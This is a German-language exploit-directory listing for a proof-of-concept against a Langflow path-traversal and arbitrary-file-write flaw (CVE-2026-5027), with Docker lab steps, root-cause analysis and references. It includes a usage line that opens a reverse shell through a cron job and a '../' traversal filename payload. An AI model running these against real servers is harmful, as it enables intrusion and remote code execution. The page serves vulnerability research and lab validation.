Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-5027 — Proof-of-Concept-Exploit für CVE-2026-5027, einen Path-Traversal und beliebiges Dateischreiben im /api/v2/files-Endpunkt von Langflow, mit Docker-Lab und Reverse-Shell-Option. | Kitploit
Tools/GitHubGitHub/yym8538/cve-2026-5027
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsRemote-Access-Tool
GitHubyym8538/cve-2026-5027

CVE-2026-5027

Proof-of-Concept-Exploit für CVE-2026-5027, einen Path-Traversal und beliebiges Dateischreiben im /api/v2/files-Endpunkt von Langflow, mit Docker-Lab und Reverse-Shell-Option.

Repository anzeigen
1vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Dieser Beitrag ist ein Forschungartikel, der von EQSTLab veröffentlicht wurde.

Dank an Yahia Hamza, der diese Schwachstelle gemeldet und analysiert hat.

CVE-2026-5027

★ CVE-2026-5027 Langflow Path Traversal / Arbitrary File Write PoC ★ CVE-2026-5027 PoC test


Beschreibung

CVE-2026-5027 : Langflow Arbitrary File Write Vulnerability

Beschreibung: Eine Path-Traversal-Schwachstelle in Langflow <= 1.8.4 ermöglicht es Angreifern, beliebige Dateien außerhalb des vorgesehenen Upload-Verzeichnisses zu schreiben, indem sie einen manipulierten Multipart-filename an den Endpunkt /api/v2/files übermitteln. In Bereitstellungen, in denen Auto-Login aktiviert ist oder die Authentifizierung anderweitig nur schwach durchgesetzt wird, kann dieses Problem ausgenutzt werden, um Remote Code Execution zu erreichen, indem angreiferkontrollierte Inhalte an sensible Dateisystemorte geschrieben werden.


Laboreinrichtung

Erstellen und starten Sie die verwundbare Umgebung mit Docker:

Image erstellen

root@kitploit:~
docker build -t cve-2026-5027 .

Container starten

root@kitploit:~
docker run --rm -it -p 9013:9013 --name cve-2026-5027 cve-2026-5027

Verwendung

Ausführen

root@kitploit:~
# Proof of concept (writes test file to /tmp/)
python3 CVE-2026-5027.py -t <TARGET>

# Reverse shell via cron job
python3 CVE-2026-5027.py -t <TARGET> --lhost <YOUR_IP> --lport 4444

Analyse

Verwundbarer Endpunkt

root@kitploit:~
POST /api/v2/files

Das Problem besteht darin, dass die Upload-Funktionalität dem vom Client bereitgestellten Multipart-filename-Wert vertraut. Anstatt einen sicheren serverseitigen Speichernamen zu generieren oder den aufgelösten Pfad auf ein dediziertes Upload-Verzeichnis zu beschränken, erlaubt der verwundbare Codepfad Traversierungssequenzen wie ../, den endgültigen Zielpfad zu beeinflussen.

Infolgedessen kann ein Angreifer das vorgesehene Speicher-Stammverzeichnis verlassen und die Anwendung dazu zwingen, Dateien an beliebige Orte im Server-Dateisystem zu schreiben.

Ein repräsentativer Ausnutzungsablauf ist wie folgt:

  1. Ein Access-Token durch normalen Login oder eine Bereitstellung mit aktiviertem Auto-Login erhalten.
  2. Eine Multipart-Upload-Anfrage an /api/v2/files übermitteln.
  3. Einen manipulierten filename mit Path-Traversal-Sequenzen angeben.
  4. Langflow dazu bringen, angreiferkontrollierte Inhalte außerhalb des erwarteten Speicherverzeichnisses zu schreiben.

Dies ist grundsätzlich ein CWE-22: Improper Limitation of a Pathname to a Restricted Directory-Problem.

Technische Grundursache

Der Sicherheitsfehler wird durch unzureichende Bereinigung und Validierung benutzerkontrollierter Dateipfade während der Upload-Verarbeitung verursacht. Die Anwendung akzeptiert den ursprünglichen Client-Dateinamen und übergibt ihn an den Speicher-Workflow, ohne angemessen Pfadnormalisierung und -eindämmung durchzusetzen.

Aus defensiver Sicht ist das gefährliche Muster konzeptionell ähnlich wie das folgende:

root@kitploit:~
save_path = base_dir / file.filename

Wenn file.filename Path-Traversal-Komponenten wie die folgenden enthält:

root@kitploit:~
../../../../tmp/poc.txt

kann der endgültig aufgelöste Pfad außerhalb von base_dir zeigen, was beliebiges Dateischreiben ermöglicht.

Warum dies wichtig ist

Schwachstellen für beliebiges Dateischreiben sind oft schwerwiegender als Standardprobleme mit uneingeschränktem Upload, da der Angreifer nicht nur die Dateiinhalte, sondern auch den Zielpfad kontrolliert. Abhängig von den Laufzeitberechtigungen des Langflow-Prozesses kann dies Folgendes ermöglichen:

  • Überschreiben von Anwendungsdateien
  • Änderung von Start- oder geplanten Task-Dateien
  • Persistenz durch Shell-Initialisierungs- oder Schlüsseldateien
  • Eskalation von beliebigem Dateischreiben zu Remote Code Execution

Szenario

root@kitploit:~
+-------------------------------------------+
|                  Attacker                 |
+-------------------------------------------+
                      |
                      | Obtain access token
                      | or abuse auto-login
                      v
+-------------------------------------------+
|        Langflow /api/v2/files             |
+-------------------------------------------+
                      |
                      | Crafted multipart filename
                      | (../ directory traversal)
                      v
+-------------------------------------------+
| Arbitrary File Write (Outside Upload Dir) |
+-------------------------------------------+
                      |
                      | Write to sensitive location
                      v
+-------------------------------------------+
|      Potential Remote Code Execution      |
+-------------------------------------------+

Haftungsausschluss

Dieses Repository ist nicht dazu gedacht, die unbefugte Ausnutzung von Langflow-Instanzen zu erleichtern. Der Zweck dieses Projekts ist es, Sicherheitsforschern, Verteidigern und Entwicklern zu helfen, die Schwachstelle zu verstehen, die Exposition in kontrollierten Umgebungen zu validieren und wirksame Gegenmaßnahmen anzuwenden.


Referenzen

https://www.tenable.com/security/research/tra-2026-26

https://www.cve.org/CVERecord?id=CVE-2026-5027

https://github.com/yahiahamza/CVE-2026-5027

https://github.com/langflow-ai/langflow

Tool herunterladen